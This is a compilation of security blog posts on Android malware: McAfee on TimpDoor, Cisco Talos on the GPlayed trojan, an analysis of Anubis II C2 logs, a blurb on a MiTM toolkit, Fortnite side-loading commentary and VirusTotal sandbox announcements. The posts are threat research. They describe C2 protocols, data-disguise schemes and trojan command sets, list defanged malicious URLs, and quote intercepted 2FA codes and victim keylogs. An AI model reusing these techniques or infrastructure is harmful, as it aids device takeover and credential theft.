According to the “Last modified” dates on the server, the oldest APK in the folder is chainmail.apk (March 12) while the newest is VoiceApp.apk (August 27) suggesting the campaign has run for at least five months and is likely still active.

We can divide the APK files into two groups by size (5.1MB and 3.1MB). The main difference between them is that the oldest use an HTTP proxy (LittleProxy) while the newest (July and August) use a Socks proxy (MicroSocks), which allows the routing of all traffic for any kind of network protocol (not only HTTP)TTp on any port. Other notable differences are the package name, control server URLs, and the value of appVersion in the updateStatus method—ranging from 1.1.0 to 1.4.0.

In addition to the US folder we also found a CA folder, which could stand for Canada.

Figure 10. The “CA” folder on the distribution server.

Checking the files in the CA folder we found that VoiceApp.apk and relevanbest.apk are the same file with appVersion 1.4.0 (Socks proxy server). Octarineiads.apk is version 1.1.0, with an HTTP proxy.

TimpDoor vs MilkyDoor

TimpDoor is not the first malware that turns Android devices into mobile proxies to forward network traffic from a control server using a Socks proxy though an SSH tunnel. In April 2017 researchers discovered MilkyDoor, an apparent successor of DressCode, which was found a year earlier. Both threats were distributed as Trojanized apps in Google Play. DressCode installs only a Socks proxy server on the infected device; MilkyDoor also protects that connection to bypass network security restrictions using remote port forwarding via SSH, just as TimpDoor does. However, there are some relevant differences between TimpDoor and MilkyDoor:

  • Distribution: Instead of being part of a Trojanized app in Google Play, TimpDoor uses a completely fake voice app distributed via text message
  • SSH connection: While MilkyDoor uploads the device and IP address information to a control server to receive the connection details, TimpDoor already has the information in its code. TimpDoor uses the information to get the remote port to perform dynamic port forwarding and to periodically send updated device data.
  • Pure proxy functionality: MilkyDoor was apparently an adware integrator in early versions of the SDK and later added backdoor functionality. TimpDoor’s sole purpose (at least in this campaign) is to keep the SSH tunnel open and the proxy server running in the background without the user’s consent.

MilkyDoor seems to be a more complete SDK, with adware and downloader functionality. TimpDoor has only basic proxy functionality, first using an HTTP proxy and later Socks.

Conclusion

TimpDoor is the latest example of Android malware that turns devices into mobile backdoors—potentially allowing cybercriminals encrypted access to internal networks, which represents a great risk to companies and their systems. The versions found on the distribution server and the simple proxy functionality implemented in them shows that this threat is probably still under development. We expect it will evolve into new variants.

Although this threat has not been seen on Google Play, this SMS phishing campaign distributing TimpDoor shows that cybercriminals are still using traditional phishing techniques to trick users into installing malicious applications.

McAfee Mobile Security detects this threat as Android/TimpDoor. To protect yourselves from this and similar threats, employ security software on your mobile devices and do not install apps from unknown sources.

The post Android/TimpDoor Turns Mobile Devices Into Hidden Proxies appeared first on McAfee Blogs.

GPlayed Trojan – .Net playing with Google Market

This blog post is authored by Vitor Ventura.

Introduction

In a world where everything is always connected, and mobile devices are involved in individuals' day-to-day lives more and more often, malicious actors are seeing increased opportunities to attack these devices. Cisco Talos has identified the latest attempt to penetrate mobile devices — a new Android trojan that we have dubbed "GPlayed." This is a trojan with many built-in capabilities. At the same time, it's extremely flexible, making it a very effective tool for malicious actors. The sample we analyzed uses an icon very similar to Google Apps, with the label "Google Play Marketplace" to disguise itself.

The malicious application is on the left-hand side.



What makes this malware extremely powerful is the capability to adapt after it's deployed. In order to achieve this adaptability, the operator has the capability to remotely load plugins, inject scripts and even compile new .NET code that can be executed. Our analysis indicates that this trojan is in its testing stage but given its potential, every mobile user should be aware of GPlayed. Mobile developers have recently begun eschewing traditional app stores and instead want to deliver their software directly through their own means. But GPlayed is an example of where this can go wrong, especially if a mobile user is not aware of how to distinguish a fake app versus a real one.

Trojan architecture and capabilities

This malware is written in .NET using the Xamarin environment for mobile applications. The main DLL is called "Reznov.DLL." This DLL contains one root class called "eClient," which is the core of the trojan. The imports reveal the use of a second DLL called "eCommon.dll." We determined that the "eCommon" file contains support code and structures that are platform independent. The main DLL also contains eClient subclasses that implement some of the native capabilities.

The package certificate is issued under the package name, which also resembles the name of the main DLL name.

Certificate information

The Android package is named "verReznov.Coampany." The application uses the label "Installer" and its name is "android.app.Application."

Package permissions

The trojan declares numerous permissions in the manifest, from which we should highlight the BIND_DEVICE_ADMIN, which provides nearly full control of the device to the trojan.

This trojan is highly evolved in its design. It has modular architecture implemented in the form of plugins, or it can receive new .NET source code, which will be compiled on the device in runtime.

Initialization of the compiler object

The plugins can be added in runtime, or they can be added as a package resource at packaging time. This means that the authors or the operators can add capabilities without the need to recompile and upgrade the trojan package on the device.

Trojan native capabilities

This is a full-fledged trojan with capabilities ranging from those of a banking trojan to a full spying trojan. This means that the malware can do anything from harvest the user's banking credentials, to monitoring the device's location. There are several indicators (see section "trojan activity" below) that it is in its last stages of development, but it has the potential to be a serious threat.

Trojan details

Upon boot, the trojan will start by populating a shared preferences file with the configuration it has on its internal structures. Afterward, it will start several timers to execute different tasks. The first timer will be fired on the configured interval (20 seconds in this case), pinging the command and control (C2) server. The response can either be a simple "OK," or can be a request to perform some action on the device. The second timer will run every five seconds and it will try to enable the WiFi if it's disabled. The third timer will fire every 10 seconds and will attempt to register the device into the C2 and register wake-up locks on the system to control the device's status.

During the trojan registration stage, the trojan exfiltrates private information such as the phone's model, IMEI, phone number and country. It will also report the version of Android that the phone is running and any additional capabilities.

Device registration

This is the last of the three main timers that are created. The trojan will register the SMS handler, which will forward the contents and the sender of all of the SMS messages on the phone to the C2.

The final step in the trojan's initialization is the escalation and maintenance of privileges in the device. This is done both by requesting admin privileges on the device and asking the user to allow the application to access the device's settings.

Privilege escalation requests

The screens asking for the user's approval won't close unless the user approves the privilege escalation. If the user closes the windows, they will appear again due to the timer configuration.

After the installation of the trojan, it will wait randomly between three and five minutes to activate one of the native capabilities — these are implemented on the eClient subclass called "GoogleCC." This class will open a WebView with a Google-themed page asking for payment in order to use the Google services. This will take the user through several steps until it collects all the necessary credit card information, which will be checked online and exfiltrated to the C2. During this process, an amount of money, configured by the malicious operator, is requested to the user.

Steps to request the user's credit card information

In our sample configuration, the request for the views above cannot be canceled or removed from the screen — behaving just like a screen lock that won't be disabled without providing credit card information.

All communication with the C2 is done over HTTP. It will use either a standard web request or it will write data into a web socket if the first method fails. The C2 can also use WebSocket as a backup communication channel.

Before sending any data to the C2 using the trojan attempts to disguise its data, the data is serialized using JSON, which is then encoded in Base64. However, the trojan replaces the '=' by 'AAAZZZXXX', the '+' by '|' and the '/' by '.' to disguise the Base64.

Request encoding process

The HTTP requests follow the format below, while on the WebSocket only the query data is written.

<server path>?q=<IMEI>-<REQUEST CODE>:<Obfuscated Base64 encoded data>

As is common with trojans, the communication is always initiated by the trojan on the device to the C2. The request codes are actually replies to the C2 action requests, which are actually called "responses." There are 27 response codes that the C2 can use to make requests to the trojan, which pretty much match what's listed in the capabilities section.
  • Error
  • Registration
  • Ok
  • Empty
  • SendSMS
  • RequestGoogleCC
  • Wipe
  • OpenBrowser
  • SendUSSD
  • RequestSMSList
  • RequestAppList
  • RequestLocation
  • ShowNotification
  • SetLockPassword
  • LockNow
  • MuteSound
  • LoadScript
  • LoadPlugin
  • ServerChange
  • StartApp
  • CallPhone
  • SetPingTimer
  • SMSBroadcast
  • RequestContacts
  • AddInject
  • RemoveInject
  • Evaluate
Another feature of this trojan is the ability to register injects, which are JavaScript snippets of code. These will be executed in a WebView object created by the trojan. This gives the operators the capability to trick the user into accessing any site while stealing the user's cookies or forging form fields, like account numbers or phone numbers.

Trojan activity

At the time of the writing of this post, all URLs (see IOC section) found on the sample were inactive, and it does not seem to be widespread. There are some indicators that this sample is just a test sample on its final stages of development. There are several strings and labels still mentioning 'test' or 'testcc' — even the URL used for the credit card data exfiltration is named "testcc.php."

Debug information on logcat

Another indicator is the amount of debugging information the trojan is still generating — a production-level trojan would keep its logging to a minimum.

The only sample was found on public repositories and almost seemed to indicate a test run to determine the detection ratio of the sample. We have observed this trojan being submitted to public antivirus testing platforms, once as a package and once for each DLL to determine the detection ratio. The sample analyzed was targeted at Russian-speaking users, as most of the user interaction pages are written in Russian. However, given the way the trojan is built, it is highly customizable, meaning that adapting it to a different language would be extremely easy. The wide range of capabilities doesn't limit this trojan to a specific malicious activity like a banking trojan or a ransomware. This makes it impossible to create a target profile.

Conclusion

This trojan shows a new path for threats to evolve. Having the ability to move code from desktops to mobile platforms with no effort, like the eCommon.DLL demonstrates that malicious actors can create hybrid threats faster and with fewer resources involved than ever before. This trojan's design and implementation is of an uncommonly high level, making it a dangerous threat. These kinds of threats will become more common, as more and more companies decide to publish their software directly to consumers.

There have been several recent examples of companies choosing to release their software directly to consumers, bypassing traditional storefronts. The average user might not have the necessary skills to distinguish legitimate sites from malicious ones. We've seen that this has been the case for many years with spear-phishing campaigns on desktop and mobile platforms, so, unfortunately, it doesn't seem that this will change any time soon. And this just means attackers will continue to be successful.

Coverage

Additional ways our customers can detect and block this threat are listed below.

Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.

Cisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious websites and detects malware used in these attacks.

Email Security can block malicious emails sent by threat actors as part of their campaign.

Network Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System (NGIPS), and Meraki MX can detect malicious activity associated with this threat.

AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.

Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

Indicators of compromise (IOC)


URLs
hxxp://5.9.33.226:5416
hxxp://172.110.10.171:85/testcc.php
hxxp://sub1.tdsworker.ru:5555/3ds/

Hash values
Package.apk - A342a16082ea53d101f556b50532651cd3e3fdc7d9e0be3aa136680ad9c6a69f
eCommon.dl - 604deb75eedf439766896f05799752de268baf437bf89a7185540627ab4a4bd1
Reznov.dll - 17b8665cdbbb94482ca970a754d11d6e29c46af6390a2d8e8193d8d6a527dec3

Custom activity prefix
com.cact.CAct

Android Malware Intercepts SMS 2FA: We have the Logs!

A couple years ago I was doing some phishing investigations training at the Police School in Santiago, Chile.  One module in my training was called "Logs Don't Lie" which pointed out that in most cases we have everything we need to prioritize a phishing response just by looking at the log files, either on the compromised phishing server, or in the Financial Institutions own logs.

Malware C2 servers are another great place to apply the rule "Logs Don't Lie."  Most security researchers realize that there is a great cloud of fellow researchers on Twitter sharing little tips and glimpses of their investigations.  @LukasStefanko and @nullcookies and I have been looking at a C2 server for a piece of Android malware.  And the Logs are AMAZINGLY helpful at understanding just what kind of damage such a trojan can do!    (Sidenote:  @nullcookies is a monster for finding fresh and interesting phish (and often related tools), while @LukasStefanko is an awesome malware analyst for ESET, specializing in Android-based malware.  You should follow both on Twitter if you care about such things.  Thanks to them both for the pointer that leads to what follows.)

In this case, the malware is believed to be called "Anubis II" and likely uses the "Builder" that is depicted in this YouTube video, titled "Builder Android Bot Anubis 2"

Launcher the APK Builder "Android Botnet Anubis II" 

Malware actor chooses from his list of banking targets
In the comments section of the video, someone has shared a screen shot of the botmaster's control panel.  In this case it is demonstrating that 619 Android phones can be controlled from the botnet:

Phones that can be controlled from Anubis II control panel
In the particular instance referred to by Lukas and NullCookies, the malware seems to have been active primarily in June of 2018.   The server hosting the Anubis II panel has a list of banks that it can present.

The targets which have custom web inject (or phone inject) content include:
  • 7 Austrian banks
  • 18 Australian banks
  • 5 Canadian banks
  • 6 Czech banks
  • 11 German banks
  • 11 Spanish banks
  • 11 French banks
  • 8 Hong Kong banks
  • 11 Indian banks
  • 6 Japanese banks
  • 1 Kenyan bank
  • 4 New Zealand banks
  • 32 Polish banks
  • 4 Romanian banks
  • 9 Turkish banks
  • 10 UK banks (Bank of Scotland, Barclays, CSGCSDNMB, Halifax, HSBC, Natwest, Royal Bank of Scotland, Santander, TSB, Ulster)
  • 10 US banks (Bank of America, Capital One, Chase, Fifth Third, NetTeller, Skrill, SunTrust, USAA, US Bank, Wells Fargo Mobile)

Fake Android Login Pages for Banks 

While each of the 190 sites has a fake login page available, we thought we would show a sampling from banks around the world . . . 

There are also several Crypto Currency organizations listed:
  • blockchaine
  • coinbase
  • localbitcoin
  • unocoin
As well as some Online Payment, Email, and Social Media sites:
  • eBay
  • Facebook
  • Gmail
  • PayPal
  • ZebPay

Each bank on the list has the equivalent of a phishing page that can be presented if the owner of the android phone attempts to log in to the given bank.

 Some of them have silly typographical errors that will hopefully reduce success, such as this Wells Fargo content, inviting the phone owner to "Sing In" to the bank.  Perhaps there is a Wells Fargo Choir?  Hopefully that will cause victims to NOT fall for this particular malware!

The Wells Fargo Choir?  Sing On!


The SMS Intercepts

One of the main benefits of having access to the server was to see so many examples of successful SMS message intercepts!  At the time of the server dump, this one contained 32,900+ unique "keylog" entries and 52,000+ logged SMS messages from at least 47 unique devices.

Here's an example showing a Bank Two Factor Authentication request being forward to the criminals:

Text: Bank of Redacted: 819881 is your authorization code which expires in 10 minutes. If you didn't request the code, call 1.800.xxx.xxxx for assistance.

Keylogging was also enabled, allowing the criminal to see when a bank app was being used:

06/14/2018, 09:07:34 EDT|(FOCUSED)|[From:, REDACTED BANK, Account Number:, ******6680, Date:, May 30, 2018 10:10:42 AM EDT, Status:, Canceled, Amount:, $100.00, Type:, Deposit, Transfer ID:, 25098675]

In this example, an online payment company is sharing a message:

06/29/2018, 15:28:46 EDT|(CLICKED)|[Friendly reminderThis is Mr. XXXXXXX from REDACTED. This is a friendly reminder that you have a payment due today by 6pm If you have any questions or need to make a payment  via phone call 804-999-9999 or we have a new payment processing system that allows , for your convenience, to simply text in the last 4 digits of a card you've previously used and the security code and we're able to process your payment.  Feel free to call  REDACTED with any questions at 804-xxx-xxxx]

Hundreds of Gmail verification codes were found in the logs:

06/14/2018, 00:19:33 EDT|(FOCUSED)|[G-473953 is your Google verification code., 1 min ago]

Quite a few Uber codes were also found in the logs:

Text: [#] 9299 is your Uber code. qlRnn4A1sbt

Paypal, Quickbooks, LinkedIn, Facebook, Stash, and Stripe all had 2FA codes make appearances in the logs:

Text: FREE PayPal: Your security code is: 321842. Your code expires in 10 minutes. Please don't reply.

Text: [Your QuickBooks Self-Employed Code is 952708, 1 min ago]

Text: 383626 is your Facebook password reset code or reset your password here: https://fb.com/l/9wBUVuGxxxx5zC

Text: Your LinkedIn verification code is 967308.

Text: 103-667 is your Stripe verification code to use your payment info with Theresa.

Text: Your Stash verification code is 912037. Happy Stashing!

Text: Cash App: 157-578 is the sign in code you requested.

Text: Your verification code for GotHookup is: 7074

In a directory called "/numers/" there were also examples of address book dumps from phone contacts.  The small number of these seem to indicate this would be a "triggered" request, where the botnet operator would have to request the address book.  In the example we found, with seven area code (404) numbers, four (770) numbers and four (678) numbers, it is likely an Atlanta, Georgia based victim.

The Keylogging feature also seems to be something that is turned on or off by request of the botnet operators.  There were far fewer devices for which keylogs were found.   Example keylog entries looked like this:

A telephone prompt looked like this:


  • 06/15/2018, 14:38:55 EDT|(CLICKED)|[Call management, •, 10m, 4 missed calls, Ashley Brown (3), Mom]
  • 06/15/2018, 14:38:59 EDT|(CLICKED)|[Call Ashley Big Cousin, Quick contact for Ashley Brown]
  • 06/15/2018, 14:39:01 EDT|(CLICKED)|[1 804-999-9999, Mobile, Call Ashley Brown]


Responding to a message looked like this:


  • 06/15/2018, 16:02:34 EDT|(CLICKED)|[Messaging, •, now, Expand button, (804) 999-9999 , Hey Terry can you send the address, REPLY]
  • 06/15/2018, 16:02:37 EDT|(FOCUSED)|[Aa]
  • 06/15/2018, 16:02:46 EDT|(CLICKED)|[Copy, Forward, Delete]
  • 06/15/2018, 16:02:50 EDT|(FOCUSED)|[]
  • 06/15/2018, 16:02:54 EDT|(CLICKED)|[Messaging]
  • 06/15/2018, 16:02:57 EDT|(CLICKED)|[Enter message]
  • 06/15/2018, 16:05:11 EDT|(CLICKED)|[Answer]
  • 06/15/2018, 16:05:29 EDT|(CLICKED)|[]
  • 06/15/2018, 16:10:50 EDT|(FOCUSED)|[]
  • 06/15/2018, 16:10:52 EDT|(CLICKED)|[Enter]
  • 06/15/2018, 16:11:01 EDT|(FOCUSED)|[2007 Their Address Ct  North CityTheyTyped OK 11111]
  • 06/15/2018, 16:11:03 EDT|(FOCUSED)|[]
A YouTube session looked like this:


  • 06/27/2018, 15:23:36 EDT|(CLICKED)|[YouTube]
  • 06/27/2018, 15:23:46 EDT|(CLICKED)|[Pause video]
  • 06/27/2018, 15:41:19 EDT|(FOCUSED)|[14:46, Go to channel, FINDING OUT THE GENDER!!!, Menu, The Rush Fam · 26K views4 hours ago, 6:12, Go to channel, TRY NOT TO CRY CHALLENGE REACTION WITH KID (SHE ACTUALLY CRIED), Menu, CJ SO COOL · 2.5M views · 1 year ago, SUBSCRIBED]
  • 06/27/2018, 15:46:38 EDT|(FOCUSED)|[]
  • 06/27/2018, 15:46:41 EDT|(CLICKED)|[Enter]
  • 06/27/2018, 15:46:53 EDT|(CLICKED)|[Play video]
  • 06/27/2018, 15:48:06 EDT|(CLICKED)|[ · 0:11]
  • 06/27/2018, 15:48:09 EDT|(CLICKED)|[ · 0:09]
  • 06/27/2018, 15:48:10 EDT|(CLICKED)|[ · 0:08]
  • 06/27/2018, 15:54:30 EDT|(CLICKED)|[Suggested: "BREAKING UP IN FRONT OF COMPANY!!" PRANK ON PANTON SQUAD!!!]

Distribution 

From looking for this malware in various collections, such as Virus Total Intelligence, it seems that the malware is fairly common.  Many new versions of the malware show up in their collection every day.   The most common point of distribution seems to be from the Google Play Store.

A popularly reported stream of such apps was reported on by, well, just about everyone in July 2018.  Some of the headlines included:

Anubis Strikes Again: Mobile Malware continues to plague users in Official App Stores  - from IBM X-Force Research's Security Intelligence blog

Best graphic goes to Secure Computing Magazine:

https://www.scmagazine.com/


A more recent post, from AlienVault, (20 days ago):  "Anubis Android Malware in the Play Store

A search in VirusTotal Intelligence reveals 62 new filehashes ONLY FROM TODAY (September 10, 2018) that match a definition name of "Anubis".  Some of the more popular names for the trojan on VirusTotal include:

DrWeb:  Android.BankBot.1679
Ikarus: Trojan-Banker.AndroidOS.Anubis
Kaspersky: HEUR:Trojan-Dropper.AndroidOS.Hqwar.bbSophos: Andr/BankSpy-AH 




Kaspersky authored a special article on this banking trojan, which they call "HQWar" back in April under the headline "Phantom menace: mobile banking trojan modifications reach all-time high: Mobile banking Trojans hit the list of cyber-headaches in Q2 2018"   In that article they said they have documented 61,000 versions! 

Kaspersky: Phantom Menace
As I mentioned Lukas at the beginning of this blog, ESET has produced an amazing number of articles on Android banking trojans lurking in the Google Play store.  Here are a few of them:

Intercepter-NG – Android App For Hacking

Intercepter-NG – Android App For Hacking

Intercepter-NG is a multi functional network toolkit including an Android app for hacking, the main purpose is to recover interesting data from the network stream and perform different kinds of MiTM attacks.

Specifically referring to Intercepter-NG Console Edition which works on a range of systems including NT, Linux, BSD, MacOSX, IOS and Android.

The Windows version is the one with the most powerful feature-set, but the Android app is fairly handy too.

Read the rest of Intercepter-NG – Android App For Hacking now! Only available at Darknet.

Attention Fortnite Fans: The New Android App Was Found Containing a Massive Vulnerability

Back in June, Fortnite fans, hopeful for an Android version of the game, were teased with fake apps, which were in turn part of a cybercriminal’s scheme. Fast forward to present day, and their prayers have been answered, as a real Android version of the popular game has been released. However, a recently revealed flaw in the app is raining on their parade, as Google security researchers have revealed this week that the Fortnite Android app is vulnerable to man-in-the-disk (MitD) attacks.

For some context, a man-in-the-disk (MitD) attack is rooted in an app’s ability to use ‘External Storage,’ which is one of the two types of data storage methods supported by the Android OS. With this attack, a cybercriminal can watch a particular app’s External Storage space and tamper with the data stored in this storage space since its shared by all apps.

Now, you may be wondering how does this work with this new Fortnite Android app vulnerability? This recently disclosed vulnerability allows for malicious apps (that are already installed on a user’s phone) to hijack the Fortnite app’s installation process and download other malicious apps. This means a hacker could essentially install any nasty software they wanted on to a victim’s phone. And according to recent McAfee research, this is precisely what some parents fear when their children game online. In fact, 52% worry about cybercriminals hacking gaming accounts.

Fortunately, Epic Games is already on the case. The major video game company has already released version 2.1.0 of this application, which patches this vulnerability. However, Fortnite users must still take a few important security steps of their own in order to protect themselves from this attack. If you’re a Fortnite gamer, be sure to follow these tips:

  • Update, update, update. No matter the application, it can’t be stressed enough how important it is to always update your app as soon as an update is available. Patches (like the one released by Epic Games) are typically included with every update.
  • Clean house. Given this hack relies on preexisting malicious apps a victim’s phone, do your due diligence and clean up the applications on your device. This means deleting any old apps you don’t use, or ones that you may have downloaded from outside an official app store. If you’re unsure if an application is secure or not, do some research – conduct a quick google search or scan through the app’s review section on an app store and see if it has had any issues with security.
  • Use a mobile security solution. As app vulnerabilities such as this one continue to impact mobile users, make sure your devices are prepared for any threat coming their way. To do just that, cover these devices with a mobile security solution, such as McAfee Mobile Security.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Attention Fortnite Fans: The New Android App Was Found Containing a Massive Vulnerability appeared first on McAfee Blogs.

Fortnite: When Dollars and Cents Trumps Security!

When Epic Games recently announced and subsequently released Fortnite for Android, it took the decision to bypass the Play Store and ask users to side-load the app. After I read that Epic Games’ brilliant idea was to ask Android users to essentially downgrade the security on their devices, there was a lot of head-on-desk action.

Side-loading an app onto an Android device is essentially asking the user to download it from a website instead of the Play Store and then ignore the Android warnings about installing apps from untrusted locations. In more recent Android versions this safety net is called “Install unknown apps” and when a user tries to install an app directly from a website, the operating system will ask them a few times if they really want to do this. Note that this is does not affect users on Apple iOS devices as Apple locks down app distribution to the App Store.

Don’t get me wrong, I understand both the business reason and the developer logic that drove Epic Games to release the Android version in this way. For developers, Android’s lack of homogeneity means they often have to validate their app across multiple stores, each with its own constraints and minimum requirements. Thus, what should be a simple app release can gain an Nth degree of complexity; increased time to develop and associated maintenance, leading to increased cost. This is not an attractive prospect for any vendor wanting to deliver a product. Added to the fact that the Play Store takes a 30% cut on all transactions, you can see why an app vendor would look to avoid this if they could! Let’s face it, gaming companies have to make money in order to recuperate the investment in the development and maintenance of the game.

You may be reading this wondering why incentivising users to side-load popular games is really a problem. Fundamentally, it introduces bad habits to users. These bad habits break down the general foundations of mobile device security. The Fortnite game has a huge following and we can’t neglect the message being sent not only to users but also other app developers.

In InfoSec, we constantly argue the benefits of teaching users about safe and secure principals when using electronic devices, browsing the web and installing applications. The Epic Games Android installation is the antithesis of these teachings, instead sending a clear message to users – especially a younger generation that will one day enter the workforce – that it is ok to install apps from any location.

The fact is, Epic Games is inadvertently making  it easier for a malicious party to trick users into downloading fake apps and providing an opportunity for these malicious parties to introduce fake apps in the official store. This has been seen before, especially in the banking industry, and was even the case for Fortnite itself during the beta period. Google Pay Protect is one element of sanity in this situation as it will scan the apps on the device. Unfortunately this is only a recent addition to Android and is not always available depending on the version or the manufacturer of the device.

The issues continue even after the app is installed and being used. Fortnite, like many games, is free to play but relies extensively on in-app purchases – the pay to win paradigm. By not using the Play Store to deliver the app originally, the vendor needs to set-up its own payment infrastructure and ensure it is safe. This in itself is not an easy task and can be thwart with errors and potential for data loss.

Stepping back and analysing the situation, where does one place blame? I think a majority of us in the industry, myself included, will scorn the vendor for not doing the right thing and promoting bad habits to users. Looking beyond the initial rapid shame response from the industry, I think it is interesting to put oneself in the vendor’s shoes. I can see how the lack of standardisation, draconian process and exorbitant fees would make it unattractive to go to market via the various app stores in the “proper way”. Perhaps it is time for companies like Apple and Google to rethink the app distribution model, so all can benefit from a secure platform?

Realistically, I believe that this situation just boils down to the ability for a business to make a profit and you know what, this isn’t the first time or place where security has been compromised or downgraded because of money. Let’s face it, we see it all the time – most recently in IoT security and more generally in corporate security when a security risk is accepted instead of investing time and funds in fixing it.

This is why we can’t have secure things!

Update: Seems like fake Fortnite apps are already in the wild, more here

Thanks to Hannah Finch for the editorial review

The post Fortnite: When Dollars and Cents Trumps Security! appeared first on Liquidmatrix Security Digest.

Multisandbox project welcomes Cyber adAPT ApkRecon


Two weeks ago we announced the release of our new VirusTotal Droidy Android sandbox, a virtual environment that executes Android applications in an automated fashion in order to capture all the actions that the given app performs on the operating system.

Today we are excited to announce that Cyber adAPT is becoming a multisandbox project partner and will be contributing data from its ApkRecon product to the fight against malware. Like Droidy, its solution also focuses on the Android environment. In their own words:

ApkRecon is a sandbox environment developed by the research team at Cyber adAPT.  Amongst many features, the sandbox boasts a baited Android environment, a decrypted network application level capture, and an attack payload triggering system to gain insight into the true intent of each piece of analyzed malware. ApkRecon is also used to generate detection logic for Cyber adAPT’s Mobile Threat Detection product to keep users safe all around the world.

These are some example reports displaying the data contributed by Cyber adAPT:


It is worth highlighting the usefulness of this kind of data. When facing unknown files for which you have no context it can be very rich contextual information that allows analysts to have an initial judgement of the file before diving into dissecting it. For example, looking at the last example report above we notice that the file performs an HTTP POST to:

hxxp://85.206.166.7/index.php?action=command

This is a URL that we can look up in VirusTotal Graph and jump to the host referenced in the URL, i.e. 85.206.166.7. When exploring this host we notice that only the file under consideration has communicated with it, however, we do notice that expansions are available according to the referrer files relationship. This relationship pinpoints files that contain the given host within its body, even if they have not been seen communicating with it. Let’s follow this notion, something shady seems to be going on:


Badness is much easier to spot when studying the sample characterised in this other report:

In this case the APK reaches out to the URL:

hxxp://zzwx.ru/apkfff?keyword=BBM

From there we can jump to the domain entity, i.e. zzwx.ru, and expand URLs observed under such domain, as well as files communicating with it. Just two hops and we already have a preliminary idea about the initial APK that reached out to the aforementioned URL being malicious:


These examples highlight the importance of extracting as many attributes and behavioral details as possible from files, not only because they allow us to better understand a particular threat, but because they connect the dots and reveal entire campaigns. For instance, very often blocking a given network location will render ineffective all malware variants of a given campaign (inability to reach the mothership server), so even when certain variants fly under detection radars, there is still hope that network security measures will stop a given attack.

This kind of approach to block badness is something that we have shaped into a particular paper hosted in our www.virustotal.com/learn space, more specifically the paper entitled VirusTotal Intelligence for banking trojans. In this paper malicious network infrastructure is shut down by contacting the pertinent domain registrars and hosting providers, however, organizations can also blacklist these locations in their network security controls.

Meet VirusTotal Droidy, our new Android sandbox

Recently we called out Additional crispinness on the MacOS box of apples sandbox, continuing with our effort to improve our malware behavior analysis infrastructure we are happy to announce the deployment of a new Android sandbox that replaces the existing system that was developed back in 2013.

This setup characterises the actions that Android APKs perform when installed and opened; it has been baptised as “VirusTotal Droidy”. Droidy has been integrated in the context of the multisandbox project and extracts juicy details such as:
  • Network communications and SMS-related activity. 
  • Java reflection calls. 
  • Filesystem interactions. 
  • SQLite database usage. 
  • Services started, stopped, etc. 
  • Permissions checked. 
  • Registered receivers. 
  • Crypto-related activity. 
  • Etc. 

You may find below a couple of reports showcasing this new functionality. Just select the “VirusTotal Droidy” entry in the multisandbox report selector (whenever there are multiple reports):

Don’t forget to also check the detailed report:


This advanced view allows you to dig into the hooked calls and take a look at the screenshots generated when running the apps:


The multisandbox project is in good shape, and now many samples have reports for multiple sandboxes. For instance, the following report allows you to see the output of Tencent HABO and VirusTotal Droidy:
As you can see, they are pretty complementary, proving the value of having different sandboxing technologies studying the same files.

To understand the extent to which this is an improvement with respect to the 2013 setup, you can take a look at the following report. It displays by default the output of the old sandbox. Use the selector to see the new report with VirusTotal Droidy:

Now, these may seem like minimal features to improve VirusTotal’s “microscope” capabilities for better understanding a particular threat. In fact, the changes go much deeper. All of our sandboxing information nurtures other services such as VirusTotal Intelligence and VirusTotal Graph. The richer the information that we generate for individual data set items, the greater the telescopic capabilities of VirusTotal. This is how we manage to fill in the dots and quickly see all activity tied to certain resources that often show up in malware investigations. For example, let us look at the graph of one of the domains seen in the previous reports:


At a glance you can understand that something shady is going on with wonderf00l.gq and you are able to discover other malicious domains such as flashinglight.tk, checkingupd.tk, flashupdservice.cf, etc. Some of these, for instance checkolimpupd.tk, are not only used as C2 infrastructure for malware but also serve as malware distribution points.

Very often during an investigation, you might not have enough context about an individual threat, and so being able to look at the connected URLs, domains, files, IP addresses, etc. becomes crucial in understanding what is going on. My colleague Evan explains this far better than I can do in just a couple of paragraphs, so make sure you check out his video dissecting a cryptomining attack at https://www.virustotal.com/learn/watch/.

Wrapping up, don’t think of this as just new functionality to dissect individual threats. All of this data contributes to the bigger picture and increases the power of our telescope lens that sheds light into malicious behaviors on the Internet.